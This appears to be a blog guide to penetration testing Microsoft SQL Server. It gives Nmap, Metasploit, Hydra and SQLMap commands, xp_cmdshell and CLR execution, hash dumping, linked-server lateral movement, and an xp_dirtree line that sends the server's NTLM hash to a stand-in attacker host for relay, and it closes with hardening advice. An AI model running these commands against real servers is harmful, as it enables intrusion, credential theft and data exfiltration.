Microsoft SQL Server (MSSQL) is a widely used relational database management system (RDBMS) that plays a critical role in enterprise environments. It operates primarily over TCP port 1433 by default, which makes this port a common target for penetration testers. Understanding how to perform security assessments and penetration tests on MSSQL is essential for identifying and mitigating vulnerabilities in these systems.
This blog will explore the fundamentals of pentesting MSSQL, covering various attack techniques, tools, and methodologies, alongside the significance of MSSQL security in real-world scenarios.
Types of MSSQL Penetration Testing
1. Network-level Enumeration
This focuses on discovering open MSSQL services on the network. Tools like Nmap and Metasploit can be used to identify services running on port 1433 and to check for common misconfigurations.
2. Authentication Attacks
Many MSSQL servers use weak or default credentials, making brute force and credential stuffing attacks effective. Pentesters often use tools like Hydra or Metasploit to automate login attempts.
3. Privilege Escalation
Privilege escalation attacks attempt to elevate access within the MSSQL system. Exploiting misconfigurations, such as the incorrect assignment of database roles, can allow an attacker to gain administrative access.
4. SQL Injection
SQL injection (SQLi) is a powerful attack vector that can be used to execute arbitrary SQL commands on the server. Attackers can exploit vulnerabilities in web applications or directly through the MSSQL service to extract data, escalate privileges, or execute code.
5. Post-Exploitation Techniques
Once access to an MSSQL server is gained, attackers often focus on extracting sensitive data, moving laterally within the network, and persisting access by creating new accounts or using backdoors.
Importance of MSSQL Penetration Testing
MSSQL servers often store highly sensitive data, such as customer information, financial records, and intellectual property. Breaching these systems can lead to catastrophic data leaks, financial loss, and damage to an organization’s reputation. Regular penetration testing helps organizations identify and address vulnerabilities before they can be exploited by malicious actors.
Additionally, MSSQL servers are often integrated with other critical systems like Active Directory, meaning a compromise can lead to more extensive attacks on the corporate network.
Techniques for Pentesting MSSQL
1. Enumeration
Nmap Scanning: Initial reconnaissance can be done using Nmap with scripts like ms-sql-info and ms-sql-ntlm-info to gather basic information about the target MSSQL server. This includes version details and open services.
nmap --script ms-sql-info,ms-sql-ntlm-info -p 1433 <IP>
Metasploit Framework: The mssql_ping scanner can be used in Metasploit to discover MSSQL instances on a network. Further information gathering tools include mssql_enum for enumerating user accounts and roles.
msf> use auxiliary/scanner/mssql/mssql_ping
2. Brute Force Attacks
For brute-forcing MSSQL credentials, tools like Hydra and Metasploit’s auxiliary/scanner/mssql/mssql_login can be used to test multiple usernames and passwords. It is essential to be cautious with brute-force attacks, as many unsuccessful login attempts can lead to account lockouts.
hydra -L usernames.txt -P passwords.txt <IP> mssql
3. Exploiting Vulnerabilities
SQL Injection: Exploiting SQL injection vulnerabilities can give attackers direct access to MSSQL databases. For example, functions like SUSER_SID() can reveal sensitive information such as user SIDs and domain details.
SELECT SUSER_SID('domain\username');
Stored Procedures: MSSQL’s extended stored procedures, such as xp_cmdshell, allow for executing OS-level commands directly from SQL queries. If improperly configured, attackers can use these procedures to escalate privileges or move laterally within the network.
EXEC xp_cmdshell 'dir C:\';
CLR Assemblies: If attackers gain administrative access, they can create Common Language Runtime (CLR) user-defined functions to execute arbitrary .NET code within MSSQL.
4. Privilege Escalation
MSSQL offers several ways for attackers to escalate their privileges once they gain a foothold. For instance, attackers can leverage impersonation privileges (EXEC AS) to act as higher-privileged users or even execute operating system commands via the xp_cmdshell procedure.
Metasploit offers modules like mssql_escalate_execute_as to automate privilege escalation attacks.
5. Post-Exploitation
After gaining access, post-exploitation focuses on extracting sensitive data and maintaining persistence. The mssql_hashdump module in Metasploit can be used to dump user password hashes from the MSSQL database. Attackers can also create backdoor accounts or modify existing ones to maintain long-term access.
msf> use auxiliary/admin/mssql/mssql_hashdump
Scripts and Tools for Pentesting MSSQL
Nmap: For service enumeration and detecting open MSSQL ports.
nmap -sV -p 1433 --script ms-sql-info <IP>
Metasploit Framework: Provides multiple auxiliary modules for scanning, brute forcing, and post-exploitation in MSSQL environments.
msf> use auxiliary/scanner/mssql/mssql_login
Hydra: A powerful tool for brute-force attacks against MSSQL.
hydra -L usernames.txt -P passwords.txt mssql://<IP>
SQLMap: An automated tool that can detect and exploit SQL injection vulnerabilities in MSSQL databases.
sqlmap -u <URL> --dbms=mssql
Impacket’s A useful Python tool for interacting with MSSQL servers, allowing for SQL queries, login attempts, and more.
python3 <username>@<IP> -windows-auth
MSSQL, being a critical component of many enterprise environments, is a high-priority target for attackers. Effective pentesting of MSSQL involves a combination of network scanning, brute-force attacks, SQL injection exploitation, and privilege escalation techniques. Tools like Nmap, Metasploit, and Hydra are essential for these operations, while understanding the intricacies of SQL Server functions and stored procedures is crucial for advanced exploitation.
Regularly conducting thorough penetration tests on MSSQL systems can help organizations identify vulnerabilities and misconfigurations that could otherwise lead to severe security breaches. By staying vigilant and proactive, organizations can significantly reduce their attack surface and safeguard their data assets.
For more detailed steps and examples, check out resources on sites like HackTricks.
Add-On Notes for Pentesting MSSQL from Additional Sources
1. Advanced MSSQL Enumeration
In addition to standard Nmap scans, several tools can provide more extensive information about the SQL environment. For example, PowerUpSQL is a versatile toolkit that integrates with the Windows environment and automates common tasks like database discovery, user enumeration, and privilege escalation. This tool can also check for weak passwords, run SQL queries, and extract password hashes.
Reference: PowerUpSQL on GitHub
2. SQL Server Links for Lateral Movement
In a Windows domain environment, MSSQL servers are often interconnected, and databases may link to others through Linked Servers. Attackers can use these linked servers to move laterally between systems and compromise additional databases. By querying the sys.servers or sys.linked_logins tables, pentesters can enumerate all the linked servers and test for weaknesses in authentication between them.
SELECT * FROM sys.servers;
SELECT * FROM sys.linked_logins;
Once identified, linked servers can be exploited using credentials or tokens from the compromised MSSQL server to access other databases, gaining access to more sensitive data or higher-privileged accounts.
Reference: SQL Linked Server Exploitation
3. MSSQL over SMB
Out-of-band (OOB) exploitation techniques like SMB relay attacks are another vector that can be used in MSSQL pentesting. Many SQL Server procedures (e.g., xp_dirtree, xp_fileexist) can be exploited to force the server to make a network request, potentially leaking the server’s NTLMv2 hash. This hash can be relayed over SMB to authenticate into other systems or cracked to retrieve plaintext credentials.
EXEC master..xp_dirtree '\\attacker-server\share';
Reference: SQL Injection for SMB Relay Attacks
4. Payload Delivery via CLR Assemblies
Besides using xp_cmdshell, an alternative technique for executing OS commands is through CLR assemblies. CLR (Common Language Runtime) allows you to run .NET code within MSSQL. Attackers can compile a malicious .NET assembly, load it as a custom SQL function, and execute arbitrary code within the SQL Server’s security context. CLR assemblies are extremely powerful but require administrative privileges on the database to load.
CREATE ASSEMBLY MaliciousAssembly
FROM 'C:\Path\To\Assembly.dll'
Reference: Malicious CLR Assembly Execution
5. Attacking SQL Jobs
MSSQL has a powerful task automation system called SQL Server Agent, which allows administrators to create scheduled jobs. If these jobs are misconfigured or contain sensitive information like plaintext passwords, they can be exploited by attackers. Additionally, poorly secured SQL jobs can sometimes be leveraged to execute arbitrary code or escalate privileges. A pentester can enumerate SQL jobs using the following query:
SELECT * FROM msdb.dbo.sysjobs;
SELECT * FROM msdb.dbo.sysjobsteps;
Reference: SQL Agent Job Vulnerabilities
6. MSSQL Authentication Protocols
MSSQL supports various authentication methods, including Windows Authentication and SQL Server Authentication. Windows Authentication is often integrated with Active Directory, so if a domain account is compromised, it may allow attackers to authenticate to MSSQL servers automatically.
SQL Server Authentication, on the other hand, uses a separate username and password, which can be brute-forced if weak credentials are used. MSSQL uses NTLMv2 for network authentication, and understanding how NTLM hashes are transmitted over the network can open additional attack vectors such as pass-the-hash or relay attacks.
Reference: MSSQL Authentication Methods
7. Data Exfiltration Techniques
Once attackers gain access to an MSSQL server, exfiltrating data without raising alarms is a critical post-exploitation task. Techniques like DNS tunneling or HTTP-based exfiltration can be employed by executing SQL queries that make outbound connections to external servers.
For instance, leveraging the OPENROWSET function in SQL Server, an attacker can create a query that communicates with an external HTTP endpoint to exfiltrate data.
Reference: Advanced Data Exfiltration via SQL
8. Defensive Measures
Organizations can harden MSSQL servers by implementing best practices such as:
Disabling unused features like xp_cmdshell, xp_dirtree, and CLR assemblies.
Enforcing strong password policies for both SQL and Windows authentication.
Network segmentation to limit exposure of MSSQL servers and ensuring that port 1433 is not directly exposed to the internet.
Enabling logging and auditing for all MSSQL events, including failed login attempts, which can help detect brute-force attempts.
Reference: Securing SQL Server
9. Automated Tools
Beyond manual testing, automated tools like DBShield can be deployed to protect SQL servers. DBShield is a database firewall that monitors and logs database activities, providing an additional layer of defense against SQL injection and privilege escalation attacks.
Reference: DBShield GitHub
These advanced notes enhance the initial coverage, adding depth on lateral movement, specific tools for automating tasks, and additional defense mechanisms. The combination of different approaches, including network reconnaissance, brute force, privilege escalation, and post-exploitation techniques, provides a well-rounded strategy for thoroughly assessing the security of MSSQL servers.